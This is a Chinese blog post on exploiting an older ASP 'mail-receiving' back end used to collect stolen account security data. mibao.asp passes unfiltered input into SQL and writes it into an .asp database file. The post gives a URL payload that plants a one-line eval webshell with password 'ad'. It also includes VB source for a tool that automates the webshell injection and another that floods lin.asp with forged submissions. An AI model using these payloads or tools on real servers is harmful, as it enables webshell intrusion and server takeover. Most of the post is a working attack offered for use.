asp收信程序漏洞及利用程序

来源:韦江代博客 责任编辑:栏目编辑 发表时间:2013-07-01 20:22 点击:

伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)
主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..
mibao.asp文件对提交的参数没有任何过滤

if action="put" then
sql="select * from mibao where u='"&request("u")&"'"
set rs=Server.CreateObject("ADODB.RecordSet")
rs.open sql,conn,1,3
if rs.eof then
rs.addnew
rs("u")=request("u")
rs("pos")=request("pos")
rs("p")="等待破解"
rs.update
rs.close

response.write "addok"
else
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"
conn.execute(sql)
response.write "updateok"
end if
end if
第一行代码处

ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的数据插进了mibaoaa.asp
asp后缀的数据库文件..未做防下载处理..提交一句话木马..很容易得到webshell

假设箱子地址是
http://127.0.0.1/
就访问
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3

返回 "addok"就说明插马成功
接着
http://127.0.0.1/mibaoaa.asp访问小马..
密码是ad.上传大马拿到webshell

根据此漏洞我用VB写了一个简单的利用程序..

程序VB源码

Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet连接网页
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置
If aa <> 0 Then '页头中包含404
MsgBox "木马插入失败!", 48, "失败!" '则说明该网页不存在
Else '如果页头中不包含“404”
MsgBox "木马插入成功!", 64, "恭喜!" '说明网页存在
Command2.Enabled = True
End If
End Sub

Private Sub Command2_Click()
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then
MsgBox "已经存在!请不要重复此操作!", 16, "error!"
Else
Text2.Text = Text1.Text + "/mibaoaa.asp"
MsgBox "请使用一句话木马客户段连接!密码ad!", 64, "成功!"
Text2.Visible = True
End If
End Sub

Private Sub Command3_Click()
End
End Sub


另外看到贴中有人提到刷信问题..lin.asp也是没怎么过滤的..可以外部提交数据

VB刷信代码

Private Sub Command1_Click()
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet连接网页
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置
If aa <> 0 Then '页头中包含404
MsgBox "刷信失败!默认收信页面可能被改名!", 48, "失败!" '则说明该网页不存在
Else '如果页头中不包含“404”
MsgBox "刷信成功!请登陆后台查看!", 64, "恭喜!" '说明网页存在
End If
End Sub

Private Sub Command2_Click()
End
End Sub

    发表评论
    请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
    用户名: 验证码:点击我更换图片
    最新评论 更多>>
    网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
    Copyright © 2008-2015 计算机技术学习交流网. 版权所有

    豫ICP备11007008号-1